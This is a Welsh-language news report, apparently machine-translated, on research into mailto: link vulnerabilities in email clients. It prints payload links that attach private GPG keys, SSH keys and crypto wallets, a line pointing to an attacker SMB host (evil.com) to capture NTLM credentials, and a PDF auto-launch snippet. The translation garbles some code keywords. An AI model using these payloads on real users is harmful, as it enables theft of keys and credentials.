Ymchwilwyr o Brifysgol Ruhr Bochum (yr Almaen)
Dolenni «
Roedd cleientiaid post Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) a Pegasus Mail yn agored i ymosodiad dibwys sy'n eich galluogi i atodi'n awtomatig unrhyw ffeil leol, a nodir trwy ddolen fel "mailto:?attach=path_to_file". Mae'r ffeil ynghlwm heb arddangos rhybudd, felly heb sylw arbennig, efallai na fydd y defnyddiwr yn sylwi y bydd y llythyr yn cael ei anfon gydag atodiad.
Er enghraifft, gan ddefnyddio dolen fel “mailto:[e-bost wedi'i warchod]&subject=Title&body=Testun&attach=~/.gnupg/secring.gpg" gallwch fewnosod allweddi preifat o GnuPG yn y llythyren. Gallwch hefyd anfon cynnwys waledi crypto (~/.bitcoin/wallet.dat), allweddi SSH (~/.ssh/id_rsa) ac unrhyw ffeiliau sy'n hygyrch i'r defnyddiwr. Ar ben hynny, mae Thunderbird yn caniatáu ichi atodi grwpiau o ffeiliau trwy fwgwd gan ddefnyddio lluniadau fel “attach=/tmp/*.txt”.
Yn ogystal â ffeiliau lleol, mae rhai cleientiaid e-bost yn prosesu dolenni i storfa rhwydwaith a llwybrau yn y gweinydd IMAP. Yn benodol, mae IBM Notes yn caniatáu ichi drosglwyddo ffeil o gyfeiriadur rhwydwaith wrth brosesu dolenni fel “attach=\\evil.com\dummyfile”, yn ogystal â rhyng-gipio paramedrau dilysu NTLM trwy anfon dolen i weinydd SMB a reolir gan yr ymosodwr (bydd y cais yn cael ei anfon gyda'r defnyddiwr paramedrau dilysu cyfredol).
Mae Thunderbird yn prosesu ceisiadau fel “attach=imap:///fetch>UID>/INBOX>1/” yn llwyddiannus, sy'n eich galluogi i atodi cynnwys o ffolderi ar y gweinydd IMAP. Ar yr un pryd, mae negeseuon sy'n cael eu hadalw o IMAP, wedi'u hamgryptio trwy OpenPGP ac S/MIME, yn cael eu dadgryptio'n awtomatig gan y cleient post cyn eu hanfon. Roedd datblygwyr Thunderbird
Roedd hen fersiynau o Thunderbird hefyd yn agored i ddau amrywiad ymosodiad arall ar PGP ac S/MIME a gynigiwyd gan yr ymchwilwyr. Yn benodol, roedd Thunderbird, yn ogystal ag OutLook, PostBox, eM Client, MailMate a R2Mail2, yn destun ymosodiad amnewid allwedd, a achoswyd gan y ffaith bod y cleient post yn awtomatig yn mewnforio ac yn gosod tystysgrifau newydd a drosglwyddir mewn negeseuon S/MIME, sy'n caniatáu yr ymosodwr i drefnu amnewid allweddi cyhoeddus sydd eisoes wedi'u storio gan y defnyddiwr.
Mae'r ail ymosodiad, y mae Thunderbird, PostBox a MailMate yn agored iddo, yn trin nodweddion y mecanwaith ar gyfer cadw negeseuon drafft yn awtomatig ac yn caniatáu, gan ddefnyddio paramedrau mailto, i gychwyn dadgryptio negeseuon wedi'u hamgryptio neu ychwanegu llofnod digidol ar gyfer negeseuon mympwyol, gyda trosglwyddo'r canlyniad wedyn i weinydd IMAP yr ymosodwr. Yn yr ymosodiad hwn, trosglwyddir y ciphertext trwy'r paramedr “corff”, a defnyddir y tag “meta refresh” i gychwyn galwad i weinydd IMAP yr ymosodwr. Er enghraifft: ' '
I brosesu dolenni “mailto:" yn awtomatig heb ryngweithio â defnyddwyr, gellir defnyddio dogfennau PDF a ddyluniwyd yn arbennig - mae'r weithred OpenAction mewn PDF yn caniatáu ichi lansio'r triniwr mailto yn awtomatig wrth agor dogfen:
% PDF-1.5
1 0 gwrthrych
<< /Math /Catalog /Agored [2 0 R] >>
endobj
2 0 gwrthrych
<< /Math /Cam Gweithredu /S /URI/URI (mailto:?body=—— DECHRAU NEGES PGP ——[…])>>
endobj
Ffynhonnell: opennet.ru